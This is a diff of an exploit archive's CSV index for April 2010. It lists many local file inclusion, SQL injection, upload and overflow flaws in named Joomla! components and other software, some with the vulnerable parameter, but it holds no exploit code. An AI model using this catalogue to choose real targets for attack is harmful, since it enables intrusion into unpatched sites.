12068,platforms/php/webapps/12068.txt,"Joomla! Component 'com_loginbox' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
|
||||
12069,platforms/php/webapps/12069.txt,"Joomla! Component 'com_bca-rss-syndicator' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
|
||||
12070,platforms/php/webapps/12070.txt,"Joomla! Component 'com_Joomlaupdater' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
|
||||
12071,platforms/php/webapps/12071.txt,"jevoncms - (Local File Inclusion / Remote File Inclusion) Multiple Vulnerabilities",2010-04-05,eidelweiss,php,webapps,0
|
||||
12072,platforms/windows/dos/12072.pl,"MyVideoConverter 2.15 - Local Denial of Service",2010-04-05,anonymous,windows,dos,0
|
||||
12073,platforms/windows/dos/12073.pl,"MP3 Wav Editor 3.80 - '.mp3' Local Denial of Service",2010-04-05,anonymous,windows,dos,0
|
||||
12074,platforms/windows/dos/12074.pl,"Portable AVS DVD Authoring 1.3.3.51 - Local Crash (PoC)",2010-04-05,R3d-D3V!L,windows,dos,0
|
||||
12075,platforms/php/webapps/12075.txt,"LionWiki 3.x - 'index.php' Arbitrary File Upload",2010-04-05,ayastar,php,webapps,0
|
||||
12076,platforms/php/webapps/12076.pl,"ilchClan 1.0.5 - 'cid' SQL Injection",2010-04-05,"Easy Laster",php,webapps,0
|
||||
12077,platforms/php/webapps/12077.txt,"Joomla! Component News Portal com_news - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12078,platforms/php/webapps/12078.txt,"Joomla! Component FreeStyle FAQ Lite 1.3 com_fss (faqid) - SQL Injection",2010-04-06,"Chip d3 bi0s",php,webapps,0
|
||||
12077,platforms/php/webapps/12077.txt,"Joomla! Component 'com_news_portal' 1.5.x - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12078,platforms/php/webapps/12078.txt,"Joomla! Component 'com_fss' 1.3 - 'faqid' Parameter SQL Injection",2010-04-06,"Chip d3 bi0s",php,webapps,0
|
||||
12079,platforms/windows/dos/12079.pl,"Microsoft Office 2010 Beta - Communicator SIP Denial of Service",2010-04-06,indoushka,windows,dos,0
|
||||
12080,platforms/windows/dos/12080.txt,"Foxit Reader 3.2.1.0401 - Denial of Service",2010-04-06,juza,windows,dos,0
|
||||
12081,platforms/windows/dos/12081.php,"Jzip 1.3 - '.zip' Unicode Buffer Overflow (PoC)",2010-04-06,mr_me,windows,dos,0
|
||||
12082,platforms/php/webapps/12082.txt,"Joomla! Component Saber Cart com_sebercart - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12083,platforms/php/webapps/12083.txt,"Joomla! Component J!WHMCS Integrator com_jwhmcs - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12084,platforms/php/webapps/12084.txt,"Joomla! Component Juke Box com_jukebox - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12085,platforms/php/webapps/12085.txt,"Joomla! Component Joomla! Flickr com_Joomlaflickr - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12086,platforms/php/webapps/12086.txt,"Joomla! Component Highslide JS com_hsconfig - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12087,platforms/php/webapps/12087.txt,"Joomla! Component Fabrik com_fabrik - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12088,platforms/php/webapps/12088.txt,"Joomla! Component Affiliate Feeds com_datafeeds - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12089,platforms/php/webapps/12089.txt,"Joomla! Component Appointment com_appointment - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12082,platforms/php/webapps/12082.txt,"Joomla! Component 'com_sebercart' 1.0.0.12 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12083,platforms/php/webapps/12083.txt,"Joomla! Component 'com_jwhmcs' 1.5.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12084,platforms/php/webapps/12084.txt,"Joomla! Component 'com_jukebox' 1.7 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12085,platforms/php/webapps/12085.txt,"Joomla! Component 'com_Joomlaflickr' 1.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12086,platforms/php/webapps/12086.txt,"Joomla! Component 'com_hsconfig' 1.5 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12087,platforms/php/webapps/12087.txt,"Joomla! Component 'com_fabrik' 2.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12088,platforms/php/webapps/12088.txt,"Joomla! Component 'com_datafeeds' 880 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12089,platforms/php/webapps/12089.txt,"Joomla! Component 'com_appointment' 1.5 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12090,platforms/freebsd/local/12090.txt,"McAfee Email Gateway (formerly IronMail) - Privilege Escalation",2010-04-06,"Nahuel Grisolia",freebsd,local,0
|
||||
12091,platforms/freebsd/local/12091.txt,"McAfee Email Gateway (formerly IronMail) - Internal Information Disclosure",2010-04-06,"Nahuel Grisolia",freebsd,local,0
|
||||
12092,platforms/hardware/webapps/12092.txt,"McAfee Email Gateway (formerly IronMail) - Cross-Site Scripting",2010-04-06,"Nahuel Grisolia",hardware,webapps,0
|
||||
|
@ -11055,94 +11055,94 @@ id,file,description,date,author,platform,type,port
|
|||
12094,platforms/php/webapps/12094.txt,"ShopSystem - SQL Injection",2010-04-06,Valentin,php,webapps,0
|
||||
12095,platforms/linux/dos/12095.txt,"Virata EmWeb R6.0.1 - Remote Crash",2010-04-06,"Jobert Abma",linux,dos,0
|
||||
12096,platforms/windows/dos/12096.txt,"Juke 4.0.2 - Denial of Service Multiple Files",2010-04-06,anonymous,windows,dos,0
|
||||
12097,platforms/php/webapps/12097.txt,"Joomla! Component XOBBIX - prodid SQL Injection",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12097,platforms/php/webapps/12097.txt,"Joomla! Component 'com_xobbix' 1.0 - 'prodid' Parameter SQL Injection",2010-04-06,AntiSecurity,php,webapps,0
|
||||
12098,platforms/php/webapps/12098.txt,"WordPress Plugin NextGEN Gallery 1.5.1 - Cross-Site Scripting",2010-04-06,"Alejandro Rodriguez",php,webapps,0
|
||||
12100,platforms/asp/webapps/12100.txt,"Espinas CMS - SQL Injection",2010-04-07,"Pouya Daneshmand",asp,webapps,0
|
||||
12101,platforms/php/webapps/12101.txt,"Joomla! Component aWiki com_awiki - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0
|
||||
12102,platforms/php/webapps/12102.txt,"Joomla! Component VJDEO com_vjdeo 1.0 - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0
|
||||
12101,platforms/php/webapps/12101.txt,"Joomla! Component 'com_awiki' - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0
|
||||
12102,platforms/php/webapps/12102.txt,"Joomla! Component 'com_vjdeo' 1.0 - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0
|
||||
12103,platforms/multiple/local/12103.txt,"Local Glibc shared library (.so) 2.11.1 - Exploit",2010-04-07,Rh0,multiple,local,0
|
||||
12104,platforms/windows/dos/12104.py,"Anyzip 1.1 - '.zip' PoC (SEH)",2010-04-07,ITSecTeam,windows,dos,0
|
||||
12105,platforms/php/webapps/12105.txt,"Free Image & File Hosting - Arbitrary File Upload",2010-04-07,indoushka,php,webapps,0
|
||||
12106,platforms/php/webapps/12106.txt,"Istgah for Centerhost - Multiple Vulnerabilities",2010-04-07,indoushka,php,webapps,0
|
||||
12107,platforms/php/webapps/12107.txt,"Plume CMS 1.2.4 - Multiple Local File Inclusion",2010-04-07,eidelweiss,php,webapps,0
|
||||
12108,platforms/php/webapps/12108.txt,"Joomla! Component com_articles - SQL Injection",2010-04-08,"pratul agrawal",php,webapps,0
|
||||
12108,platforms/php/webapps/12108.txt,"Joomla! Component 'com_articles' - SQL Injection",2010-04-08,"pratul agrawal",php,webapps,0
|
||||
12109,platforms/multiple/dos/12109.txt,"Multiple Vendor 'librpc.dll' Signedness Error - Remote Code Execution",2010-04-08,ZSploit.com,multiple,dos,0
|
||||
12110,platforms/windows/dos/12110.pl,"CompleteFTP 3.3.0 - Remote Memory Consumption Denial of Service",2010-04-08,"Jonathan Salwan",windows,dos,0
|
||||
12111,platforms/php/webapps/12111.txt,"Joomla! Component Webee Comments - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0
|
||||
12112,platforms/php/webapps/12112.txt,"Joomla! Component Realtyna Translator - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0
|
||||
12113,platforms/php/webapps/12113.txt,"Joomla! Component AWDwall-Joomla! - (cbuser) Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0
|
||||
12111,platforms/php/webapps/12111.txt,"Joomla! Component 'com_webeecomment' 2.0 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0
|
||||
12112,platforms/php/webapps/12112.txt,"Joomla! Component 'com_realtyna' 1.0.15 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0
|
||||
12113,platforms/php/webapps/12113.txt,"Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0
|
||||
12114,platforms/multiple/remote/12114.txt,"miniature java Web server 1.71 - Multiple Vulnerabilities",2010-04-08,"cp77fk4r ",multiple,remote,0
|
||||
12115,platforms/php/webapps/12115.txt,"Kubeit CMS - SQL Injection",2010-04-08,Phenom,php,webapps,0
|
||||
12117,platforms/windows/remote/12117.txt,"Java Deployment Toolkit - Performs Insufficient Validation of Parameters",2010-04-09,"Tavis Ormandy",windows,remote,0
|
||||
12118,platforms/php/webapps/12118.txt,"Joomla! Component PowerMail Pro com_powermail - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0
|
||||
12118,platforms/php/webapps/12118.txt,"Joomla! Component 'com_powermail' 1.5.3 - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0
|
||||
12119,platforms/windows/remote/12119.pl,"Microsoft Windows FTP Server 1.4 - Authentication Bypass",2010-04-09,chap0,windows,remote,0
|
||||
12120,platforms/php/webapps/12120.txt,"Joomla! Component Foobla Suggestions com_foobla - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0
|
||||
12121,platforms/php/webapps/12121.txt,"Joomla! Component JA Voice com_javoice - Local File Inclusion",2010-04-09,kaMtiEz,php,webapps,0
|
||||
12120,platforms/php/webapps/12120.txt,"Joomla! Component 'com_foobla_suggestions' 1.5.1.2 - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0
|
||||
12121,platforms/php/webapps/12121.txt,"Joomla! Component 'com_javoice' - Local File Inclusion",2010-04-09,kaMtiEz,php,webapps,0
|
||||
12122,platforms/multiple/remote/12122.txt,"JAVA Web Start - Arbitrary Command-Line Injection",2010-04-09,"Ruben Santamarta ",multiple,remote,0
|
||||
12123,platforms/php/webapps/12123.txt,"Joomla! Component com_pcchess - Local File Inclusion",2010-04-09,team_elite,php,webapps,0
|
||||
12124,platforms/php/webapps/12124.txt,"Joomla! Component huruhelpdesk - SQL Injection",2010-04-09,bumble_be,php,webapps,0
|
||||
12123,platforms/php/webapps/12123.txt,"Joomla! Component 'com_pcchess' - Local File Inclusion",2010-04-09,team_elite,php,webapps,0
|
||||
12124,platforms/php/webapps/12124.txt,"Joomla! Component 'com_huruhelpdesk' - SQL Injection",2010-04-09,bumble_be,php,webapps,0
|
||||
12128,platforms/php/webapps/12128.txt,"GarageSales - Arbitrary File Upload",2010-04-09,saidinh0,php,webapps,0
|
||||
12130,platforms/linux/local/12130.py,"(Linux Kernel 2.6.34-rc3) ReiserFS (Redhat / Ubuntu 9.10) - xattr Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0
|
||||
12131,platforms/windows/dos/12131.py,"Tembria Server Monitor 5.6.0 - Denial of Service",2010-04-09,Lincoln,windows,dos,0
|
||||
12132,platforms/php/webapps/12132.pl,"Joomla! Component com_agenda 1.0.1 - 'id' SQL Injection",2010-04-09,v3n0m,php,webapps,0
|
||||
12132,platforms/php/webapps/12132.pl,"Joomla! Component 'com_agenda' 1.0.1 - 'id' Parameter SQL Injection",2010-04-09,v3n0m,php,webapps,0
|
||||
12133,platforms/multiple/webapps/12133.txt,"Asset Manager 1.0 - Arbitrary File Upload",2010-04-09,"Shichemt Alen and NeT_Own3r",multiple,webapps,0
|
||||
12134,platforms/php/webapps/12134.txt,"MMHAQ CMS - SQL Injection",2010-04-10,s1ayer,php,webapps,0
|
||||
12135,platforms/php/webapps/12135.txt,"mygamingladder MGL Combo System 7.5 - SQL Injection",2010-04-10,"Easy Laster",php,webapps,0
|
||||
12136,platforms/php/webapps/12136.txt,"Joomla! Component com_properties[aid] - SQL Injection",2010-04-10,c4uR,php,webapps,0
|
||||
12137,platforms/php/webapps/12137.txt,"Joomla! Component allvideos - Blind SQL Injection",2010-04-10,bumble_be,php,webapps,0
|
||||
12138,platforms/php/webapps/12138.txt,"Joomla! Component com_Ca - SQL Injection",2010-04-10,DigitALL,php,webapps,0
|
||||
12136,platforms/php/webapps/12136.txt,"Joomla! Component 'com_properties' - 'aid' Parameter SQL Injection",2010-04-10,c4uR,php,webapps,0
|
||||
12137,platforms/php/webapps/12137.txt,"Joomla! Component 'com_allvideos' - Blind SQL Injection",2010-04-10,bumble_be,php,webapps,0
|
||||
12138,platforms/php/webapps/12138.txt,"Joomla! Component 'com_ca' - SQL Injection",2010-04-10,DigitALL,php,webapps,0
|
||||
12139,platforms/php/webapps/12139.txt,"Kiasabz Article News CMS Magazine - SQL Injection",2010-04-10,indoushka,php,webapps,0
|
||||
12140,platforms/php/webapps/12140.php,"xBtiTracker - SQL Injection",2010-04-11,InATeam,php,webapps,0
|
||||
12141,platforms/php/webapps/12141.txt,"MediaInSpot CMS - Local File Inclusion (1)",2010-04-11,"Amoo Arash",php,webapps,0
|
||||
12142,platforms/php/webapps/12142.txt,"Joomla! Component TweetLA! - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12143,platforms/php/webapps/12143.txt,"Joomla! Component Ticketbook - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12144,platforms/php/webapps/12144.txt,"Joomla! Component JA Job Board - Multiple Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12145,platforms/php/webapps/12145.txt,"Joomla! Component Jfeedback! - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12146,platforms/php/webapps/12146.txt,"Joomla! Component JProject Manager - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12147,platforms/php/webapps/12147.txt,"Joomla! Component Preventive And Reservation - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12148,platforms/php/webapps/12148.txt,"Joomla! Component RokModule - 'moduleid' Blind SQL Injection",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12149,platforms/php/webapps/12149.txt,"Joomla! Component spsNewsletter - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12150,platforms/php/webapps/12150.txt,"Joomla! Component AlphaUserPoints - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12151,platforms/php/webapps/12151.txt,"Joomla! Component TRAVELbook - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12142,platforms/php/webapps/12142.txt,"Joomla! Component 'com_tweetla' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12143,platforms/php/webapps/12143.txt,"Joomla! Component 'com_ticketbook' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12144,platforms/php/webapps/12144.txt,"Joomla! Component 'com_jajobboard' - Multiple Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12145,platforms/php/webapps/12145.txt,"Joomla! Component 'com_jfeedback' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12146,platforms/php/webapps/12146.txt,"Joomla! Component 'com_jprojectmanager' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12147,platforms/php/webapps/12147.txt,"Joomla! Component 'com_preventive' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12148,platforms/php/webapps/12148.txt,"Joomla! Component 'com_rokmodule' - 'moduleid' Parameter Blind SQL Injection",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12149,platforms/php/webapps/12149.txt,"Joomla! Component 'com_spsnewsletter' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12150,platforms/php/webapps/12150.txt,"Joomla! Component 'com_alphauserpoints' 1.5.5 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12151,platforms/php/webapps/12151.txt,"Joomla! Component 'com_travelbook' 1.0.1 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12152,platforms/windows/remote/12152.pl,"Trellian FTP Client - PASV Buffer Overflow",2010-04-11,zombiefx,windows,remote,0
|
||||
12153,platforms/php/webapps/12153.txt,"Joomla! Component education - SQL Injection",2010-04-11,bumble_be,php,webapps,0
|
||||
12153,platforms/php/webapps/12153.txt,"Joomla! Component 'com_education_classess' - SQL Injection",2010-04-11,bumble_be,php,webapps,0
|
||||
12154,platforms/php/dos/12154.txt,"vBulletin 'Cyb - Advanced Forum Statistics' Denial of Service",2010-04-10,"Andhra Hackers",php,dos,0
|
||||
12155,platforms/php/webapps/12155.txt,"AuroraGPT 4.0 - Remote Code Execution",2010-04-11,"Amoo Arash",php,webapps,0
|
||||
12156,platforms/windows/remote/12156.txt,"Microsoft Internet Explorer/Opera - Source Code viewer Null Character Handling",2010-04-11,"Daniel Correa",windows,remote,0
|
||||
12157,platforms/php/webapps/12157.txt,"OnePC mySite Management Software - SQL Injection",2010-04-11,Valentin,php,webapps,0
|
||||
12158,platforms/php/webapps/12158.py,"Elite Gaming Ladders 3.5 - (match) SQL Injection",2010-04-11,"Easy Laster",php,webapps,0
|
||||
12159,platforms/php/webapps/12159.txt,"Joomla! Component Multi-Venue Restaurant Menu Manager - SQL Injection",2010-04-11,Valentin,php,webapps,0
|
||||
12159,platforms/php/webapps/12159.txt,"Joomla! Component 'com_mv_restaurantmenumanager' 1.5.2 - SQL Injection",2010-04-11,Valentin,php,webapps,0
|
||||
12160,platforms/php/webapps/12160.txt,"HotNews 0.7.2 - Remote File Inclusion",2010-04-11,team_elite,php,webapps,0
|
||||
12161,platforms/windows/dos/12161.pl,"Aladdin eToken PKI Client 4.5 - Virtual File Handling Unspecified Memory Corruption (PoC)",2010-04-11,LiquidWorm,windows,dos,0
|
||||
12162,platforms/php/webapps/12162.txt,"Joomla! Component mv_restaurantmenumanager - SQL Injection",2010-04-11,Sudden_death,php,webapps,0
|
||||
12162,platforms/php/webapps/12162.txt,"Joomla! Component 'mv_restaurantmenumanager' - SQL Injection",2010-04-11,Sudden_death,php,webapps,0
|
||||
12163,platforms/php/webapps/12163.txt,"Worldviewer.com CMS - SQL Injection",2010-04-12,"41.w4r10r aka AN1L",php,webapps,0
|
||||
12164,platforms/php/webapps/12164.txt,"YaPiG 0.94.0u - Remote File Inclusion",2010-04-12,JIKO,php,webapps,0
|
||||
12165,platforms/multiple/dos/12165.txt,"PHP 5.3.0 - getopt() Denial of Service",2010-04-12,Napst3r,multiple,dos,0
|
||||
12166,platforms/php/webapps/12166.txt,"Joomla! Component Web TV com_webtv - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12167,platforms/php/webapps/12167.txt,"Joomla! Component Horoscope com_horoscope - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12168,platforms/php/webapps/12168.txt,"Joomla! Component Arcade Games com_arcadegames - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12169,platforms/php/webapps/12169.txt,"Joomla! Component Flashgames com_Flashgames - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12170,platforms/php/webapps/12170.txt,"Joomla! Component AddressBook com_AddressBook - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12171,platforms/php/webapps/12171.txt,"Joomla! Component Easy Ad Banner com_advertising - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12172,platforms/php/webapps/12172.txt,"Joomla! Component CV Maker com_cvmaker - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12173,platforms/php/webapps/12173.txt,"Joomla! Component My Files com_myfiles - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12174,platforms/php/webapps/12174.txt,"Joomla! Component Online Exam com_onlineexam - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12175,platforms/php/webapps/12175.txt,"Joomla! Component JoomMail com_joommail - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12176,platforms/php/webapps/12176.txt,"Joomla! Component Memory Book com_memory - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12177,platforms/php/webapps/12177.txt,"Joomla! Component Online Market com_market - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12178,platforms/php/webapps/12178.txt,"Joomla! Component Digital Diary com_diary - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12166,platforms/php/webapps/12166.txt,"Joomla! Component 'com_webtv' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12167,platforms/php/webapps/12167.txt,"Joomla! Component 'com_horoscope' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12168,platforms/php/webapps/12168.txt,"Joomla! Component 'com_arcadegames' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12169,platforms/php/webapps/12169.txt,"Joomla! Component 'com_Flashgames' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12170,platforms/php/webapps/12170.txt,"Joomla! Component 'com_AddressBook' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12171,platforms/php/webapps/12171.txt,"Joomla! Component 'com_advertising' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12172,platforms/php/webapps/12172.txt,"Joomla! Component 'com_cvmaker' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12173,platforms/php/webapps/12173.txt,"Joomla! Component 'com_myfiles' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12174,platforms/php/webapps/12174.txt,"Joomla! Component 'com_onlineexam' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12175,platforms/php/webapps/12175.txt,"Joomla! Component 'com_joommail' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12176,platforms/php/webapps/12176.txt,"Joomla! Component 'com_memory' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12177,platforms/php/webapps/12177.txt,"Joomla! Component 'com_market' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12178,platforms/php/webapps/12178.txt,"Joomla! Component 'com_diary' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12179,platforms/php/webapps/12179.txt,"FusionForge 5.0 - Multiple Remote File Inclusion",2010-04-12,"cr4wl3r ",php,webapps,0
|
||||
12180,platforms/php/webapps/12180.txt,"Joomla! Component com_worldrates - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12181,platforms/php/webapps/12181.txt,"Joomla! Component com_record - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12182,platforms/php/webapps/12182.txt,"Joomla! Component com_sweetykeeper - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12183,platforms/php/webapps/12183.txt,"Joomla! Component com_jdrugstopics - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0
|
||||
12184,platforms/php/webapps/12184.txt,"Joomla! Component com_sermonspeaker - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0
|
||||
12185,platforms/php/webapps/12185.txt,"Joomla! Component com_flexicontent - Local File",2010-04-12,eidelweiss,php,webapps,0
|
||||
12180,platforms/php/webapps/12180.txt,"Joomla! Component 'com_worldrates' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12181,platforms/php/webapps/12181.txt,"Joomla! Component 'com_record' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12182,platforms/php/webapps/12182.txt,"Joomla! Component 'com_sweetykeeper' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12183,platforms/php/webapps/12183.txt,"Joomla! Component 'com_jdrugstopics' - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0
|
||||
12184,platforms/php/webapps/12184.txt,"Joomla! Component 'com_sermonspeaker' - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0
|
||||
12185,platforms/php/webapps/12185.txt,"Joomla! Component 'com_flexicontent' - Local File",2010-04-12,eidelweiss,php,webapps,0
|
||||
12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 Beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-12,"cr4wl3r ",php,webapps,0
|
||||
12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - Format String",2010-04-12,"Alexey Sintsov",multiple,dos,0
|
||||
12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0
|
||||
12190,platforms/php/webapps/12190.txt,"Joomla! Component Jvehicles - (aid) SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0
|
||||
12191,platforms/php/webapps/12191.txt,"Joomla! Component com_jp_jobs 1.2.0 - 'id' SQL Injection",2010-04-13,v3n0m,php,webapps,0
|
||||
12190,platforms/php/webapps/12190.txt,"Joomla! Component 'com_jvehicles' - 'aid' Parameter SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0
|
||||
12191,platforms/php/webapps/12191.txt,"Joomla! Component 'com_jp_jobs' 1.2.0 - 'id' Parameter SQL Injection",2010-04-13,v3n0m,php,webapps,0
|
||||
12192,platforms/php/webapps/12192.txt,"Blog System 1.5 - Multiple Vulnerabilities",2010-04-13,"cp77fk4r ",php,webapps,0
|
||||
12193,platforms/php/webapps/12193.txt,"Openurgence vaccin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-13,"cr4wl3r ",php,webapps,0
|
||||
12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-13,"cr4wl3r ",php,webapps,0
|
||||
|
@ -11150,7 +11150,7 @@ id,file,description,date,author,platform,type,port
|
|||
12197,platforms/asp/webapps/12197.txt,"Mp3 MuZik - DataBase Download",2010-04-13,indoushka,asp,webapps,0
|
||||
12198,platforms/php/webapps/12198.txt,"Games Script - (Galore) Backup Dump",2010-04-13,indoushka,php,webapps,0
|
||||
12199,platforms/asp/webapps/12199.txt,"My School Script - Data Base Download",2010-04-13,indoushka,asp,webapps,0
|
||||
12200,platforms/php/webapps/12200.txt,"Joomla! Component com_QPersonel - SQL Injection",2010-04-13,Valentin,php,webapps,0
|
||||
12200,platforms/php/webapps/12200.txt,"Joomla! Component 'com_QPersonel' - SQL Injection",2010-04-13,Valentin,php,webapps,0
|
||||
12201,platforms/windows/dos/12201.html,"MagnetoSoft DNS 4.0.0.9 - ActiveX DNSLookupHostWithServer (PoC)",2010-04-13,s4squatch,windows,dos,0
|
||||
12202,platforms/windows/remote/12202.html,"MagnetoSoft ICMP 4.0.0.18 - ActiveX AddDestinationEntry Buffer Overflow",2010-04-13,s4squatch,windows,remote,0
|
||||
12203,platforms/windows/remote/12203.html,"MagnetoSoft SNTP 4.0.0.7 - ActiveX SntpGetReply Buffer Overflow",2010-04-13,s4squatch,windows,remote,0
|
||||
|
@ -11173,16 +11173,16 @@ id,file,description,date,author,platform,type,port
|
|||
12227,platforms/php/webapps/12227.txt,"YUI Images Script - Arbitrary File Upload",2010-04-14,Mr.P3rfekT,php,webapps,0
|
||||
12228,platforms/windows/dos/12228.py,"MovieLibrary 1.4.401 - Local Denial of Service (.dmv)",2010-04-14,anonymous,windows,dos,0
|
||||
12229,platforms/windows/dos/12229.py,"Book Library 1.4.162 - Local Denial of Service (.bkd)",2010-04-14,anonymous,windows,dos,0
|
||||
12230,platforms/php/webapps/12230.txt,"Joomla! Component wgPicasa com_wgpicasa - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12231,platforms/php/webapps/12231.txt,"Joomla! Component S5 Clan Roster com_s5clanroster - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12232,platforms/php/webapps/12232.txt,"Joomla! Component Photo Battle com_photobattle - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12233,platforms/php/webapps/12233.txt,"Joomla! Component MT Fire Eagle com_mtfireeagle - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12234,platforms/php/webapps/12234.txt,"Joomla! Component Media Mall Factory com_mediamall - Blind SQL Injection",2010-04-14,AntiSecurity,php,webapps,0
|
||||
